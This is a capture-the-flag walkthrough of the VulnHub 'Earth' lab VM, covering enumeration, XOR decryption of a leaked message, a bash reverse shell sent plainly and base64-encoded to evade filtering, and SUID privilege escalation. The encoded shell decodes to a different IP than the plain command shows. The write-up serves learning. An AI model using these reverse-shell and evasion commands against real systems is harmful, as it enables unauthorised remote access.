The Planets: Earth is a part of a series available on VulnHub called “The Planets”. This VM has a difficulty rating of easy. The Earth VM includes two flags: a user flag and a root flag, both represented as MD5 hashes. This machine is designed for VirtualBox environments, and using it on VMware might cause compatibility issues. The goal is to provide a learning experience for beginners and intermediate penetration testers, focusing on enumeration, exploitation, and privilege escalation techniques.
Methodologies and Tools Used:
- Host Discovery
  Tool: netdiscover
  Purpose: Identify the target IP address.
- Port Scanning and Service Enumeration
  Tool: nmap
  Purpose: Discover open ports and the services running on them.
- Web Application Enumeration
  Tool: gobuster
  Purpose: Enumerate exposed directories and files in the web application.
- Exploitation
  Tool: CyberChef, netcat
  Purpose: Decrypt the hexadecimal message and establish a reverse connection.
- Privilege Escalation
  Tool: ltrace, netcat
  Purpose: Find out what is wrong with the SUID binary, after transferring it to our machine with netcat.
A. Enumeration
After obtaining the IP Address using netdiscover, we proceeded to perform a scan using nmap to discover open ports and gather detailed information about the services running on the target.
nmap -sV -sC -p- <IP Address>
Results of the open ports:
- Port 22
- Port 80
- Port 443
We noticed two host names on port 443: earth.local and terratest.earth.local. So, let’s add both host names to the /etc/hosts file.
sudo nano /etc/hosts
Then, we focused on enumerating those two host names, earth.local and terratest.earth.local.
1. Earth.local — Web Application Enumeration
Next, we navigate to the domain http://earth.local/ in the web browser.
After attempting to gather information on the website, we will proceed with directory busting using gobuster.
gobuster dir -u <Target Address> -w /path/to/wordlist
We found an interesting directory named admin; let’s see what’s inside it:
Admin Command Tool?! But we’re asked to log in, and we don’t have any credentials yet.
Let’s search for additional information on the second domain.
2. Terratest.earth.local — Web Application Enumeration
Now we navigate to the domain https://terratest.earth.local/ in the web browser.
After attempting to gather information by viewing the page source and finding nothing, we proceed with directory busting using gobuster (the -k flag skips TLS certificate verification for the self-signed certificate).
gobuster dir -u https://terratest.earth.local/ -k -w /path/to/wordlist
After performing directory busting, we found an interesting file: robots.txt. Let’s see what’s inside this file:
We found another interesting file: testingnotes.txt. Let’s see what’s inside this file:
We found a note. From the note, we can gather that:
- Terra is the username.
- The hexadecimal message we found at http://earth.local/ is encrypted with XOR.
- The encryption key is located in the file testdata.txt.
Now, let’s see what’s inside the file testdata.txt.
Now we have the username, key, and the type of encryption. Let’s start the exploitation.
B. Exploitation
Now we are going to decrypt the hexadecimal message from http://earth.local/ by XORing it with the key from testdata.txt, using the CyberChef tool.
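The same decryption the post performs in CyberChef, as an added Python example that is not part of the original write-up. The key and message below are constructed placeholders, not the VM’s real values; recover_key shows why a XOR "encryption" whose key sits next to the ciphertext is only obfuscation.

```python
# Added example (not from the original write-up): repeating-key XOR over a
# hex-encoded message, which is what the CyberChef recipe in the post does.
# SAMPLE_KEY and SAMPLE_PLAINTEXT are constructed values, not the VM's data.
from itertools import cycle

SAMPLE_KEY = b"placeholder key text from testdata.txt"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against key, repeating the key; XOR is its own inverse."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def decrypt_hex_message(hex_message: str, key: bytes) -> str:
    """Decode the hex string as found on the page and XOR it with the key."""
    ciphertext = bytes.fromhex(hex_message.strip())
    return xor_bytes(ciphertext, key).decode("utf-8", errors="replace")


def recover_key(hex_message: str, known_plaintext: bytes) -> bytes:
    """Why this is not real encryption: ciphertext XOR known plaintext
    gives back the key bytes directly, with no secret needed."""
    ciphertext = bytes.fromhex(hex_message.strip())
    return xor_bytes(ciphertext[: len(known_plaintext)], known_plaintext)


# Constructed demonstration data, built the way the VM author would have.
SAMPLE_PLAINTEXT = b"constructed sample message"
SAMPLE_HEX = xor_bytes(SAMPLE_PLAINTEXT, SAMPLE_KEY).hex()

if __name__ == "__main__":
    print(decrypt_hex_message(SAMPLE_HEX, SAMPLE_KEY))
    print(recover_key(SAMPLE_HEX, b"constructed"))
```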
Is that the password?! I think we found the password, let’s try to log in!
Yayy we’re in!!! Now let’s try to establish a reverse connection to our machine.
Set Listening Port
nc -nlvp 5555
Send The Bash Reverse Shell
bash -i >& /dev/tcp/10.0.0.1/5555 0>&1
It turns out we couldn’t establish a connection using that method. Let’s try encoding the command using Base64 format.
echo "bash -i >& /dev/tcp/10.0.0.1/5555 0>&1" | base64Press enter or click to view image in full size

And now, try establishing the connection again by piping the Base64 string through base64 -d into bash.
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjY5LjQvNTU1NSAwPiYxCg== | base64 -d | bash
Here we got the access…. Yayyy!!!!
User Flag
We can obtain the user flag in the file /var/earth_web/user_flag.txt.
C. Privilege Escalation
We will search for files with the SUID bit set (permission 4000), as they run with the owner’s privileges and can be used for privilege escalation.
find / -perm -4000 -type f 2>/dev/null
We found an interesting file: /usr/bin/reset_root. This might help us gain root access. Let’s identify the file type using the file command.
Let’s run the script…

RESET FAILED?!! Let’s find out what the problem with the binary is using the ltrace tool. But first, we need to transfer the file to our local machine using netcat.
After successfully downloading, grant execute permissions to the file using the command chmod +x. Then, use the ltrace tool on the file.
chmod +x reset_root
ltrace ./reset_root
From the output, it appears that the binary checks for 3 files that do not exist, so we need to create them on the target machine.
Now let’s execute reset_root again…
Finally, we obtained the root password, and now let’s switch to the root user.
Root Flag
After successfully logging in as root, we can obtain the root flag in the root directory.